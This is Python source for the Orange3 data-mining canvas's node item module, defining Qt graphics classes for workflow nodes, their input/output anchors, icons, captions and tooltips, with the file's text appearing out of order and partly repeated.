self.connectedBrush = QBrush(QColor("#9CACB4"))
self.setBrush(self.normalBrush)
self.shadow = QGraphicsDropShadowEffect(
blurRadius=10, color=QColor(SHADOW_COLOR), offset=QPointF(0, 0)
)
self.setGraphicsEffect(self.shadow)
self.shadow.setEnabled(False)
# Does this item have any anchored links.
self.anchored = False
if isinstance(parent, NodeItem):
self.__parentNodeItem = parent
else:
self.__parentNodeItem = None
self.__anchorPath = QPainterPath()
self.__points = []
self.__pointPositions = []
self.__fullStroke = None
self.__dottedStroke = None
self.__shape = None
def parentNodeItem(self):
"""
Return a parent :class:`NodeItem` or ``None`` if this anchor's
parent is not a :class:`NodeItem` instance.
"""
return self.__parentNodeItem
def setAnchorPath(self, path):
"""
Set the anchor's curve path as a :class:`QPainterPath`.
"""
self.prepareGeometryChange()
self.__boundingRect = None
self.__anchorPath = path
# Create a stroke of the path.
stroke_path = QPainterPathStroker()
stroke_path.setCapStyle(Qt.RoundCap)
# Shape is wider (bigger mouse hit area - should be settable)
stroke_path.setWidth(12)
self.__shape = stroke_path.createStroke(path)
# The full stroke
stroke_path.setWidth(3)
self.__fullStroke = stroke_path.createStroke(path)
# The dotted stroke (when not connected to anything)
stroke_path.setDashPattern(Qt.DotLine)
self.__dottedStroke = stroke_path.createStroke(path)
if self.anchored:
self.setPath(self.__fullStroke)
self.setBrush(self.connectedBrush)
else:
self.setPath(self.__dottedStroke)
self.setBrush(self.normalBrush)
def anchorPath(self):
"""
Return the anchor path (:class:`QPainterPath`). This is a curve on
which the anchor points lie.
"""
return self.__anchorPath
def setAnchored(self, anchored):
"""
Set the items anchored state. When ``False`` the item draws it self
with a dotted stroke.
"""
self.anchored = anchored
if anchored:
self.setPath(self.__fullStroke)
self.setBrush(self.connectedBrush)
else:
self.setPath(self.__dottedStroke)
self.setBrush(self.normalBrush)
def setConnectionHint(self, hint=None):
"""
Set the connection hint. This can be used to indicate if
a connection can be made or not.
"""
raise NotImplementedError
def count(self):
"""
Return the number of anchor points.
"""
return len(self.__points)
def addAnchor(self, anchor, position=0.5):
"""
Add a new :class:`AnchorPoint` to this item and return it's index.
The `position` specifies where along the `anchorPath` is the new
point inserted.
"""
return self.insertAnchor(self.count(), anchor, position)
def insertAnchor(self, index, anchor, position=0.5):
"""
Insert a new :class:`AnchorPoint` at `index`.
See also
--------
NodeAnchorItem.addAnchor
"""
if anchor in self.__points:
raise ValueError("%s already added." % anchor)
self.__points.insert(index, anchor)
self.__pointPositions.insert(index, position)
anchor.setParentItem(self)
anchor.setPos(self.__anchorPath.pointAtPercent(position))
anchor.destroyed.connect(self.__onAnchorDestroyed)
self.__updatePositions()
self.setAnchored(bool(self.__points))
return index
def removeAnchor(self, anchor):
"""
Remove and delete the anchor point.
"""
anchor = self.takeAnchor(anchor)
anchor.hide()
anchor.setParentItem(None)
anchor.deleteLater()
def takeAnchor(self, anchor):
"""
Remove the anchor but don't delete it.
"""
index = self.__points.index(anchor)
del self.__points[index]
del self.__pointPositions[index]
anchor.destroyed.disconnect(self.__onAnchorDestroyed)
self.__updatePositions()
self.setAnchored(bool(self.__points))
return anchor
def __onAnchorDestroyed(self, anchor):
try:
index = self.__points.index(anchor)
except ValueError:
return
del self.__points[index]
del self.__pointPositions[index]
def anchorPoints(self):
"""
Return a list of anchor points.
"""
return list(self.__points)
def anchorPoint(self, index):
"""
Return the anchor point at `index`.
"""
return self.__points[index]
def setAnchorPositions(self, positions):
"""
Set the anchor positions in percentages (0..1) along the path curve.
"""
if self.__pointPositions != positions:
self.__pointPositions = list(positions)
self.__updatePositions()
def anchorPositions(self):
"""
Return the positions of anchor points as a list of floats where
each float is between 0 and 1 and specifies where along the anchor
path does the point lie (0 is at start 1 is at the end).
"""
return list(self.__pointPositions)
def shape(self):
if self.__shape is not None:
return self.__shape
else:
return GraphicsPathObject.shape(self)
def hoverEnterEvent(self, event):
self.shadow.setEnabled(True)
return GraphicsPathObject.hoverEnterEvent(self, event)
def hoverLeaveEvent(self, event):
self.shadow.setEnabled(False)
return GraphicsPathObject.hoverLeaveEvent(self, event)
def __updatePositions(self):
"""Update anchor points positions.
"""
for point, t in zip(self.__points, self.__pointPositions):
pos = self.__anchorPath.pointAtPercent(t)
point.setPos(pos)
class SourceAnchorItem(NodeAnchorItem):
"""
A source anchor item
"""
pass
class SinkAnchorItem(NodeAnchorItem):
"""
A sink anchor item.
"""
pass
def standard_icon(standard_pixmap):
"""
Return return the application style's standard icon for a
`QStyle.StandardPixmap`.
"""
style = QApplication.instance().style()
return style.standardIcon(standard_pixmap)
class GraphicsIconItem(QGraphicsItem):
"""
A graphics item displaying an :class:`QIcon`.
"""
def __init__(self, parent=None, icon=None, iconSize=None, **kwargs):
QGraphicsItem.__init__(self, parent, **kwargs)
self.setFlag(QGraphicsItem.ItemUsesExtendedStyleOption, True)
if icon is None:
icon = QIcon()
if iconSize is None:
style = QApplication.instance().style()
size = style.pixelMetric(style.PM_LargeIconSize)
iconSize = QSize(size, size)
self.__transformationMode = Qt.SmoothTransformation
self.__iconSize = QSize(iconSize)
self.__icon = QIcon(icon)
def setIcon(self, icon):
"""
Set the icon (:class:`QIcon`).
"""
if self.__icon != icon:
self.__icon = QIcon(icon)
self.update()
def icon(self):
"""
Return the icon (:class:`QIcon`).
"""
return QIcon(self.__icon)
def setIconSize(self, size):
"""
Set the icon (and this item's) size (:class:`QSize`).
"""
if self.__iconSize != size:
self.prepareGeometryChange()
self.__iconSize = QSize(size)
self.update()
def iconSize(self):
"""
Return the icon size (:class:`QSize`).
"""
return QSize(self.__iconSize)
def setTransformationMode(self, mode):
"""
Set pixmap transformation mode. (`Qt.SmoothTransformation` or
`Qt.FastTransformation`).
"""
if self.__transformationMode != mode:
self.__transformationMode = mode
self.update()
def transformationMode(self):
"""
Return the pixmap transformation mode.
"""
return self.__transformationMode
def boundingRect(self):
return QRectF(0, 0, self.__iconSize.width(), self.__iconSize.height())
def paint(self, painter, option, widget=None):
if not self.__icon.isNull():
if option.state & QStyle.State_Selected:
mode = QIcon.Selected
elif option.state & QStyle.State_Enabled:
mode = QIcon.Normal
elif option.state & QStyle.State_Active:
mode = QIcon.Active
else:
mode = QIcon.Disabled
w, h = self.__iconSize.width(), self.__iconSize.height()
target = QRect(0, 0, w, h)
painter.setRenderHint(
QPainter.SmoothPixmapTransform,
self.__transformationMode == Qt.SmoothTransformation,
)
self.__icon.paint(painter, target, Qt.AlignCenter, mode)
class NameTextItem(QGraphicsTextItem):
def __init__(self, *args, **kwargs):
super(NameTextItem, self).__init__(*args, **kwargs)
self.__selected = False
self.__palette = None
self.__content = ""
def paint(self, painter, option, widget=None):
if self.__selected:
painter.save()
painter.setPen(QPen(Qt.NoPen))
painter.setBrush(self.palette().color(QPalette.Highlight))
doc = self.document()
margin = doc.documentMargin()
painter.translate(margin, margin)
offset = min(margin, 2)
for line in self._lines(doc):
rect = line.naturalTextRect()
painter.drawRoundedRect(
rect.adjusted(-offset, -offset, offset, offset), 3, 3
)
painter.restore()
super(NameTextItem, self).paint(painter, option, widget)
def _blocks(self, doc):
block = doc.begin()
while block != doc.end():
yield block
block = block.next()
def _lines(self, doc):
for block in self._blocks(doc):
blocklayout = block.layout()
for i in range(blocklayout.lineCount()):
yield blocklayout.lineAt(i)
def setSelectionState(self, state):
if self.__selected != state:
self.__selected = state
self.__updateDefaultTextColor()
self.update()
def setPalette(self, palette):
if self.__palette != palette:
self.__palette = QPalette(palette)
self.__updateDefaultTextColor()
self.update()
def palette(self):
if self.__palette is None:
scene = self.scene()
if scene is not None:
return scene.palette()
else:
return QPalette()
else:
return QPalette(self.__palette)
def __updateDefaultTextColor(self):
if self.__selected:
role = QPalette.HighlightedText
else:
role = QPalette.WindowText
self.setDefaultTextColor(self.palette().color(role))
def setHtml(self, contents):
if contents != self.__content:
self.__content = contents
super().setHtml(contents)
class NodeItem(QGraphicsWidget):
"""
An widget node item in the canvas.
"""
#: Signal emitted when the scene position of the node has changed.
positionChanged = Signal()
#: Signal emitted when the geometry of the channel anchors changes.
anchorGeometryChanged = Signal()
#: Signal emitted when the item has been activated (by a mouse double
#: click or a keyboard)
activated = Signal()
#: The item is under the mouse.
hovered = Signal()
#: Span of the anchor in degrees
ANCHOR_SPAN_ANGLE = 90
#: Z value of the item
Z_VALUE = 100
def __init__(self, widget_description=None, parent=None, **kwargs):
self.__boundingRect = None
super().__init__(parent, **kwargs)
self.setFocusPolicy(Qt.ClickFocus)
self.setFlag(QGraphicsItem.ItemSendsGeometryChanges, True)
self.setFlag(QGraphicsItem.ItemHasNoContents, True)
self.setFlag(QGraphicsItem.ItemIsSelectable, True)
self.setFlag(QGraphicsItem.ItemIsMovable, True)
self.setFlag(QGraphicsItem.ItemIsFocusable, True)
# central body shape item
self.shapeItem = None
# in/output anchor items
self.inputAnchorItem = None
self.outputAnchorItem = None
# title text item
self.captionTextItem = None
# error, warning, info items
self.errorItem = None
self.warningItem = None
self.infoItem = None
self.__title = ""
self.__processingState = 0
self.__progress = -1
self.__statusMessage = ""
self.__error = None
self.__warning = None
self.__info = None
self.__anchorLayout = None
self.__animationEnabled = False
self.setZValue(self.Z_VALUE)
self.setupGraphics()
self.setWidgetDescription(widget_description)
@classmethod
def from_node(cls, node):
"""
Create an :class:`NodeItem` instance and initialize it from a
:class:`SchemeNode` instance.
"""
self = cls()
self.setWidgetDescription(node.description)
# self.setCategoryDescription(node.category)
return self
@classmethod
def from_node_meta(cls, meta_description):
"""
Create an `NodeItem` instance from a node meta description.
"""
self = cls()
self.setWidgetDescription(meta_description)
return self
def setupGraphics(self):
"""
Set up the graphics.
"""
shape_rect = QRectF(-24, -24, 48, 48)
self.shapeItem = NodeBodyItem(self)
self.shapeItem.setShapeRect(shape_rect)
self.shapeItem.setAnimationEnabled(self.__animationEnabled)
# Rect for widget's 'ears'.
anchor_rect = QRectF(-31, -31, 62, 62)
self.inputAnchorItem = SinkAnchorItem(self)
input_path = QPainterPath()
start_angle = 180 - self.ANCHOR_SPAN_ANGLE / 2
input_path.arcMoveTo(anchor_rect, start_angle)
input_path.arcTo(anchor_rect, start_angle, self.ANCHOR_SPAN_ANGLE)
self.inputAnchorItem.setAnchorPath(input_path)
self.outputAnchorItem = SourceAnchorItem(self)
output_path = QPainterPath()
start_angle = self.ANCHOR_SPAN_ANGLE / 2
output_path.arcMoveTo(anchor_rect, start_angle)
output_path.arcTo(anchor_rect, start_angle, -self.ANCHOR_SPAN_ANGLE)
self.outputAnchorItem.setAnchorPath(output_path)
self.inputAnchorItem.hide()
self.outputAnchorItem.hide()
# Title caption item
self.captionTextItem = NameTextItem(self)
self.captionTextItem.setPlainText("")
self.captionTextItem.setPos(0, 33)
def iconItem(standard_pixmap):
item = GraphicsIconItem(
self, icon=standard_icon(standard_pixmap), iconSize=QSize(16, 16)
)
item.hide()
return item
self.errorItem = iconItem(QStyle.SP_MessageBoxCritical)
self.warningItem = iconItem(QStyle.SP_MessageBoxWarning)
self.infoItem = iconItem(QStyle.SP_MessageBoxInformation)
self.prepareGeometryChange()
self.__boundingRect = None
# TODO: Remove the set[Widget|Category]Description. The user should
# handle setting of icons, title, ...
def setWidgetDescription(self, desc):
"""
Set widget description.
"""
self.widget_description = desc
if desc is None:
return
icon = icon_loader.from_description(desc).get(desc.icon)
if icon:
self.setIcon(icon)
if not self.title():
self.setTitle(desc.name)
if desc.inputs:
self.inputAnchorItem.show()
if desc.outputs:
self.outputAnchorItem.show()
tooltip = NodeItem_toolTipHelper(self)
self.setToolTip(tooltip)
def setWidgetCategory(self, desc):
"""
Set the widget category.
"""
self.category_description = desc
if desc and desc.background:
background = NAMED_COLORS.get(desc.background, desc.background)
color = QColor(background)
if color.isValid():
self.setColor(color)
def setIcon(self, icon):
"""
Set the node item's icon (:class:`QIcon`).
"""
if isinstance(icon, QIcon):
self.icon_item = GraphicsIconItem(
self.shapeItem, icon=icon, iconSize=QSize(36, 36)
)
self.icon_item.setPos(-18, -18)
else:
raise TypeError
def setColor(self, color, selectedColor=None):
"""
Set the widget color.
"""
if selectedColor is None:
selectedColor = saturated(color, 150)
palette = create_palette(color, selectedColor)
self.shapeItem.setPalette(palette)
def setTitle(self, title):
"""
Set the node title. The title text is displayed at the bottom of the
node.
"""
self.__title = title
self.__updateTitleText()
def title(self):
"""
Return the node title.
"""
return self.__title
title_ = Property(str, fget=title, fset=setTitle, doc="Node title text.")
def setFont(self, font):
"""
Set the title text font (:class:`QFont`).
"""
if font != self.font():
self.prepareGeometryChange()
self.captionTextItem.setFont(font)
self.__updateTitleText()
def font(self):
"""
Return the title text font.
"""
return self.captionTextItem.font()
def setAnimationEnabled(self, enabled):
"""
Set the node animation enabled state.
"""
if self.__animationEnabled != enabled:
self.__animationEnabled = enabled
self.shapeItem.setAnimationEnabled(enabled)
def animationEnabled(self):
"""
Are node animations enabled.
"""
return self.__animationEnabled
def setProcessingState(self, state):
"""
Set the node processing state i.e. the node is processing
(is busy) or is idle.
"""
if self.__processingState != state:
self.__processingState = state
self.shapeItem.setProcessingState(state)
if not state:
# Clear the progress meter.
self.setProgress(-1)
if self.__animationEnabled:
self.shapeItem.ping()
def processingState(self):
"""
The node processing state.
"""
return self.__processingState
processingState_ = Property(int, fget=processingState, fset=setProcessingState)
def setProgress(self, progress):
"""
Set the node work progress state (number between 0 and 100).
"""
if progress is None or progress < 0 or not self.__processingState:
progress = -1
progress = max(min(progress, 100), -1)
if self.__progress != progress:
self.__progress = progress
self.shapeItem.setProgress(progress)
self.__updateTitleText()
def progress(self):
"""
Return the node work progress state.
"""
return self.__progress
progress_ = Property(
float, fget=progress, fset=setProgress, doc="Node progress state."
)
def setStatusMessage(self, message):
"""
Set the node status message text.
This text is displayed below the node's title.
"""
if self.__statusMessage != message:
self.__statusMessage = message
self.__updateTitleText()
def statusMessage(self):
return self.__statusMessage
def setStateMessage(self, message):
"""
Set a state message to display over the item.
Parameters
----------
message : UserMessage
Message to display. `message.severity` is used to determine
the icon and `message.contents` is used as a tool tip.
"""
# TODO: Group messages by message_id not by severity
# and deprecate set[Error|Warning|Error]Message
if message.severity == UserMessage.Info:
self.setInfoMessage(message.contents)
elif message.severity == UserMessage.Warning:
self.setWarningMessage(message.contents)
elif message.severity == UserMessage.Error:
self.setErrorMessage(message.contents)
def setErrorMessage(self, message):
if self.__error != message:
self.__error = message
self.__updateMessages()
def setWarningMessage(self, message):
if self.__warning != message:
self.__warning = message
self.__updateMessages()
def setInfoMessage(self, message):
if self.__info != message:
self.__info = message
self.__updateMessages()
def newInputAnchor(self):
"""
Create and return a new input :class:`AnchorPoint`.
"""
if not (self.widget_description and self.widget_description.inputs):
raise ValueError("Widget has no inputs.")
anchor = AnchorPoint()
self.inputAnchorItem.addAnchor(anchor, position=1.0)
positions = self.inputAnchorItem.anchorPositions()
positions = uniform_linear_layout(positions)
self.inputAnchorItem.setAnchorPositions(positions)
return anchor
def removeInputAnchor(self, anchor):
"""
Remove input anchor.
"""
self.inputAnchorItem.removeAnchor(anchor)
positions = self.inputAnchorItem.anchorPositions()
positions = uniform_linear_layout(positions)
self.inputAnchorItem.setAnchorPositions(positions)
def newOutputAnchor(self):
"""
Create and return a new output :class:`AnchorPoint`.
"""
if not (self.widget_description and self.widget_description.outputs):
raise ValueError("Widget has no outputs.")
anchor = AnchorPoint(self)
self.outputAnchorItem.addAnchor(anchor, position=1.0)
positions = self.outputAnchorItem.anchorPositions()
positions = uniform_linear_layout(positions)
self.outputAnchorItem.setAnchorPositions(positions)
return anchor
def removeOutputAnchor(self, anchor):
"""
Remove output anchor.
"""
self.outputAnchorItem.removeAnchor(anchor)
positions = self.outputAnchorItem.anchorPositions()
positions = uniform_linear_layout(positions)
self.outputAnchorItem.setAnchorPositions(positions)
def inputAnchors(self):
"""
Return a list of all input anchor points.
"""
return self.inputAnchorItem.anchorPoints()
def outputAnchors(self):
"""
Return a list of all output anchor points.
"""
return self.outputAnchorItem.anchorPoints()
def setAnchorRotation(self, angle):
"""
Set the anchor rotation.
"""
self.inputAnchorItem.setRotation(angle)
self.outputAnchorItem.setRotation(angle)
self.anchorGeometryChanged.emit()
def anchorRotation(self):
"""
Return the anchor rotation.
"""
return self.inputAnchorItem.rotation()
def boundingRect(self):
# TODO: Important because of this any time the child
# items change geometry the self.prepareGeometryChange()
# needs to be called.
if self.__boundingRect is None:
self.__boundingRect = self.childrenBoundingRect()
return self.__boundingRect
def shape(self):
# Shape for mouse hit detection.
# TODO: Should this return the union of all child items?
return self.shapeItem.shape()
def __updateTitleText(self):
"""
Update the title text item.
"""
text = ['<div align="center">%s' % escape(self.title())]
status_text = []
progress_included = False
if self.__statusMessage:
msg = escape(self.__statusMessage)
format_fields = dict(parse_format_fields(msg))
if "progress" in format_fields and len(format_fields) == 1:
# Insert progress into the status text format string.
spec, _ = format_fields["progress"]
if spec != None:
progress_included = True
progress_str = "{0:.0f}%".format(self.progress())
status_text.append(msg.format(progress=progress_str))
else:
status_text.append(msg)
if self.progress() >= 0 and not progress_included:
status_text.append("%i%%" % int(self.progress()))
if status_text:
text += [
"<br/>",
'<span style="font-style: italic">',
"<br/>".join(status_text),
"</span>",
]
text += ["</div>"]
text = "".join(text)
# The NodeItems boundingRect could change.
self.prepareGeometryChange()
self.__boundingRect = None
self.captionTextItem.setHtml(text)
self.captionTextItem.document().adjustSize()
width = self.captionTextItem.textWidth()
self.captionTextItem.setPos(-width / 2.0, 33)
def __updateMessages(self):
"""
Update message items (position, visibility and tool tips).
"""
items = [self.errorItem, self.warningItem, self.infoItem]
messages = [self.__error, self.__warning, self.__info]
for message, item in zip(messages, items):
item.setVisible(bool(message))
item.setToolTip(message or "")
shown = [item for item in items if item.isVisible()]
count = len(shown)
if count:
spacing = 3
rects = [item.boundingRect() for item in shown]
width = sum(rect.width() for rect in rects)
width += spacing * max(0, count - 1)
height = max(rect.height() for rect in rects)
origin = self.shapeItem.boundingRect().top() - spacing - height
origin = QPointF(-width / 2, origin)
for item, rect in zip(shown, rects):
item.setPos(origin)
origin = origin + QPointF(rect.width() + spacing, 0)
def mousePressEvent(self, event):
if self.shapeItem.path().contains(event.pos()):
return super().mousePressEvent(event)
else:
event.ignore()
def mouseDoubleClickEvent(self, event):
if self.shapeItem.path().contains(event.pos()):
super().mouseDoubleClickEvent(event)
QTimer.singleShot(0, self.activated.emit)
else:
event.ignore()
def contextMenuEvent(self, event):
if self.shapeItem.path().contains(event.pos()):
return super().contextMenuEvent(event)
else:
event.ignore()
def focusInEvent(self, event):
self.shapeItem.setHasFocus(True)
return super().focusInEvent(event)
def focusOutEvent(self, event):
self.shapeItem.setHasFocus(False)
return super().focusOutEvent(event)
def changeEvent(self, event):
if event.type() == QEvent.PaletteChange:
self.__updatePalette()
elif event.type() == QEvent.FontChange:
self.__updateFont()
super().changeEvent(event)
def itemChange(self, change, value):
if change == QGraphicsItem.ItemSelectedChange:
self.shapeItem.setSelected(value)
self.captionTextItem.setSelectionState(value)
elif change == QGraphicsItem.ItemPositionHasChanged:
self.positionChanged.emit()
return super().itemChange(change, value)
def __updatePalette(self):
self.captionTextItem.setPalette(self.palette())
def __updateFont(self):
self.prepareGeometryChange()
self.captionTextItem.setFont(self.font())
self.__updateTitleText()
TOOLTIP_TEMPLATE = """\
<html>
<head>
<style type="text/css">
{style}
</style>
</head>
<body>
{tooltip}
</body>
</html>
"""
def NodeItem_toolTipHelper(node, links_in=[], links_out=[]):
"""
A helper function for constructing a standard tooltip for the node
in on the canvas.
Parameters:
===========
node : NodeItem
The node item instance.
links_in : list of LinkItem instances
A list of input links for the node.
links_out : list of LinkItem instances
A list of output links for the node.
"""
desc = node.widget_description
channel_fmt = "<li>{0}</li>"
title_fmt = "<b>{title}</b><hr/>"
title = title_fmt.format(title=escape(node.title()))
inputs_list_fmt = "Inputs:<ul>{inputs}</ul><hr/>"
outputs_list_fmt = "Outputs:<ul>{outputs}</ul>"
if desc.inputs:
inputs = [channel_fmt.format(inp.name) for inp in desc.inputs]
inputs = inputs_list_fmt.format(inputs="".join(inputs))
else:
inputs = "No inputs<hr/>"
if desc.outputs:
outputs = [channel_fmt.format(out.name) for out in desc.outputs]
outputs = outputs_list_fmt.format(outputs="".join(outputs))
else:
outputs = "No outputs"
tooltip = title + inputs + outputs
style = "ul { margin-top: 1px; margin-bottom: 1px; }"
return TOOLTIP_TEMPLATE.format(style=style, tooltip=tooltip)
def parse_format_fields(format_str):
formatter = string.Formatter()
format_fields = [
(field, (spec, conv))
for _, field, spec, conv in formatter.parse(format_str)
if field is not None
]
return format_fields | orange3/Orange/canvas/canvas/items/nodeitem.py | import string
from xml.sax.saxutils import escape
from AnyQt.QtWidgets import (
QGraphicsItem,
QGraphicsObject,
QGraphicsTextItem,
QGraphicsWidget,
QGraphicsDropShadowEffect,
QStyle,
QApplication,
)
from AnyQt.QtGui import (
QPen,
QBrush,
QColor,
QPalette,
QIcon,
QPainter,
QPainterPath,
QPainterPathStroker,
)
from AnyQt.QtCore import (
Qt,
QEvent,
QPointF,
QRectF,
QRect,
QSize,
QTimer,
QPropertyAnimation,
)
from AnyQt.QtCore import pyqtSignal as Signal, pyqtProperty as Property
from .graphicspathobject import GraphicsPathObject
from .utils import saturated, radial_gradient
from ...scheme.node import UserMessage
from ...registry import NAMED_COLORS
from ...resources import icon_loader
from .utils import uniform_linear_layout
def create_palette(light_color, color):
"""
Return a new :class:`QPalette` from for the :class:`NodeBodyItem`.
"""
palette = QPalette()
palette.setColor(QPalette.Inactive, QPalette.Light, saturated(light_color, 50))
palette.setColor(QPalette.Inactive, QPalette.Midlight, saturated(light_color, 90))
palette.setColor(QPalette.Inactive, QPalette.Button, light_color)
palette.setColor(QPalette.Active, QPalette.Light, saturated(color, 50))
palette.setColor(QPalette.Active, QPalette.Midlight, saturated(color, 90))
palette.setColor(QPalette.Active, QPalette.Button, color)
palette.setColor(QPalette.ButtonText, QColor("#515151"))
return palette
def default_palette():
"""
Create and return a default palette for a node.
"""
return create_palette(
QColor(NAMED_COLORS["light-yellow"]), QColor(NAMED_COLORS["yellow"])
)
def animation_restart(animation):
if animation.state() == QPropertyAnimation.Running:
animation.pause()
animation.start()
SHADOW_COLOR = "#9CACB4"
FOCUS_OUTLINE_COLOR = "#609ED7"
class NodeBodyItem(GraphicsPathObject):
"""
The central part (body) of the `NodeItem`.
"""
def __init__(self, parent=None):
GraphicsPathObject.__init__(self, parent)
assert isinstance(parent, NodeItem)
self.__processingState = 0
self.__progress = -1
self.__animationEnabled = False
self.__isSelected = False
self.__hasFocus = False
self.__hover = False
self.__shapeRect = QRectF(-10, -10, 20, 20)
self.setAcceptHoverEvents(True)
self.setFlag(QGraphicsItem.ItemSendsScenePositionChanges, True)
self.setFlag(QGraphicsItem.ItemSendsGeometryChanges, True)
self.setPen(QPen(Qt.NoPen))
self.setPalette(default_palette())
self.shadow = QGraphicsDropShadowEffect(
blurRadius=3, color=QColor(SHADOW_COLOR), offset=QPointF(0, 0)
)
self.shadow.setEnabled(True)
# An item with the same shape as this object, stacked behind this
# item as a source for QGraphicsDropShadowEffect. Cannot attach
# the effect to this item directly as QGraphicsEffect makes the item
# non devicePixelRatio aware.
shadowitem = GraphicsPathObject(self, objectName="shadow-shape-item")
shadowitem.setPen(Qt.NoPen)
shadowitem.setBrush(QBrush(QColor(SHADOW_COLOR).lighter()))
shadowitem.setGraphicsEffect(self.shadow)
shadowitem.setFlag(QGraphicsItem.ItemStacksBehindParent)
self.__shadow = shadowitem
self.__blurAnimation = QPropertyAnimation(self.shadow, b"blurRadius", self)
self.__blurAnimation.setDuration(100)
self.__blurAnimation.finished.connect(self.__on_finished)
self.__pingAnimation = QPropertyAnimation(self, b"scale", self)
self.__pingAnimation.setDuration(250)
self.__pingAnimation.setKeyValues([(0.0, 1.0), (0.5, 1.1), (1.0, 1.0)])
# TODO: The body item should allow the setting of arbitrary painter
# paths (for instance rounded rect, ...)
def setShapeRect(self, rect):
"""
Set the item's shape `rect`. The item should be confined within
this rect.
"""
path = QPainterPath()
path.addEllipse(rect)
self.setPath(path)
self.__shadow.setPath(path)
self.__shapeRect = rect
def setPalette(self, palette):
"""
Set the body color palette (:class:`QPalette`).
"""
self.palette = palette
self.__updateBrush()
def setAnimationEnabled(self, enabled):
"""
Set the node animation enabled.
"""
if self.__animationEnabled != enabled:
self.__animationEnabled = enabled
def setProcessingState(self, state):
"""
Set the processing state of the node.
"""
if self.__processingState != state:
self.__processingState = state
if not state and self.__animationEnabled:
self.ping()
def setProgress(self, progress):
"""
Set the progress indicator state of the node. `progress` should
be a number between 0 and 100.
"""
self.__progress = progress
self.update()
def ping(self):
"""
Trigger a 'ping' animation.
"""
animation_restart(self.__pingAnimation)
def hoverEnterEvent(self, event):
self.__hover = True
self.__updateShadowState()
return GraphicsPathObject.hoverEnterEvent(self, event)
def hoverLeaveEvent(self, event):
self.__hover = False
self.__updateShadowState()
return GraphicsPathObject.hoverLeaveEvent(self, event)
def paint(self, painter, option, widget):
"""
Paint the shape and a progress meter.
"""
# Let the default implementation draw the shape
if option.state & QStyle.State_Selected:
# Prevent the default bounding rect selection indicator.
option.state = option.state ^ QStyle.State_Selected
GraphicsPathObject.paint(self, painter, option, widget)
if self.__progress >= 0:
# Draw the progress meter over the shape.
# Set the clip to shape so the meter does not overflow the shape.
painter.save()
painter.setClipPath(self.shape(), Qt.ReplaceClip)
color = self.palette.color(QPalette.ButtonText)
pen = QPen(color, 5)
painter.setPen(pen)
painter.setRenderHints(QPainter.Antialiasing)
span = max(1, int(self.__progress * 57.60))
painter.drawArc(self.__shapeRect, 90 * 16, -span)
painter.restore()
def __updateShadowState(self):
if self.__hasFocus:
color = QColor(FOCUS_OUTLINE_COLOR)
self.setPen(QPen(color, 1.5))
else:
self.setPen(QPen(Qt.NoPen))
radius = 3
enabled = False
if self.__isSelected:
enabled = True
radius = 7
if self.__hover:
radius = 17
enabled = True
if enabled and not self.shadow.isEnabled():
self.shadow.setEnabled(enabled)
if self.__animationEnabled:
if self.__blurAnimation.state() == QPropertyAnimation.Running:
self.__blurAnimation.pause()
self.__blurAnimation.setStartValue(self.shadow.blurRadius())
self.__blurAnimation.setEndValue(radius)
self.__blurAnimation.start()
else:
self.shadow.setBlurRadius(radius)
def __updateBrush(self):
palette = self.palette
if self.__isSelected:
cg = QPalette.Active
else:
cg = QPalette.Inactive
palette.setCurrentColorGroup(cg)
c1 = palette.color(QPalette.Light)
c2 = palette.color(QPalette.Button)
grad = radial_gradient(c2, c1)
self.setBrush(QBrush(grad))
# TODO: The selected and focus states should be set using the
# QStyle flags (State_Selected. State_HasFocus)
def setSelected(self, selected):
"""
Set the `selected` state.
.. note:: The item does not have `QGraphicsItem.ItemIsSelectable` flag.
This property is instead controlled by the parent NodeItem.
"""
self.__isSelected = selected
self.__updateBrush()
def setHasFocus(self, focus):
"""
Set the `has focus` state.
.. note:: The item does not have `QGraphicsItem.ItemIsFocusable` flag.
This property is instead controlled by the parent NodeItem.
"""
self.__hasFocus = focus
self.__updateShadowState()
def __on_finished(self):
if self.shadow.blurRadius() == 0:
self.shadow.setEnabled(False)
class AnchorPoint(QGraphicsObject):
"""
A anchor indicator on the :class:`NodeAnchorItem`.
"""
#: Signal emitted when the item's scene position changes.
scenePositionChanged = Signal(QPointF)
#: Signal emitted when the item's `anchorDirection` changes.
anchorDirectionChanged = Signal(QPointF)
def __init__(self, *args):
QGraphicsObject.__init__(self, *args)
self.setFlag(QGraphicsItem.ItemSendsScenePositionChanges, True)
self.setFlag(QGraphicsItem.ItemHasNoContents, True)
self.__direction = QPointF()
def anchorScenePos(self):
"""
Return anchor position in scene coordinates.
"""
return self.mapToScene(QPointF(0, 0))
def setAnchorDirection(self, direction):
"""
Set the preferred direction (QPointF) in item coordinates.
"""
if self.__direction != direction:
self.__direction = direction
self.anchorDirectionChanged.emit(direction)
def anchorDirection(self):
"""
Return the preferred anchor direction.
"""
return self.__direction
def itemChange(self, change, value):
if change == QGraphicsItem.ItemScenePositionHasChanged:
self.scenePositionChanged.emit(value)
return QGraphicsObject.itemChange(self, change, value)
def boundingRect(self,):
return QRectF()
class NodeAnchorItem(GraphicsPathObject):
"""
The left/right widget input/output anchors.
"""
def __init__(self, parent, *args):
GraphicsPathObject.__init__(self, parent, *args)
self.setAcceptHoverEvents(True)
self.setPen(QPen(Qt.NoPen))
self.normalBrush = QBrush(QColor("#CDD5D9"))
self.connectedBrush = QBrush(QColor("#9CACB4"))
self.setBrush(self.normalBrush)
self.shadow = QGraphicsDropShadowEffect(
blurRadius=10, color=QColor(SHADOW_COLOR), offset=QPointF(0, 0)
)
self.setGraphicsEffect(self.shadow)
self.shadow.setEnabled(False)
# Does this item have any anchored links.
self.anchored = False
if isinstance(parent, NodeItem):
self.__parentNodeItem = parent
else:
self.__parentNodeItem = None
self.__anchorPath = QPainterPath()
self.__points = []
self.__pointPositions = []
self.__fullStroke = None
self.__dottedStroke = None
self.__shape = None
def parentNodeItem(self):
"""
Return a parent :class:`NodeItem` or ``None`` if this anchor's
parent is not a :class:`NodeItem` instance.
"""
return self.__parentNodeItem
def setAnchorPath(self, path):
"""
Set the anchor's curve path as a :class:`QPainterPath`.
"""
self.prepareGeometryChange()
self.__boundingRect = None
self.__anchorPath = path
# Create a stroke of the path.
stroke_path = QPainterPathStroker()
stroke_path.setCapStyle(Qt.RoundCap)
# Shape is wider (bigger mouse hit area - should be settable)
stroke_path.setWidth(12)
self.__shape = stroke_path.createStroke(path)
# The full stroke
stroke_path.setWidth(3)
self.__fullStroke = stroke_path.createStroke(path)
# The dotted stroke (when not connected to anything)
stroke_path.setDashPattern(Qt.DotLine)
self.__dottedStroke = stroke_path.createStroke(path)
if self.anchored:
self.setPath(self.__fullStroke)
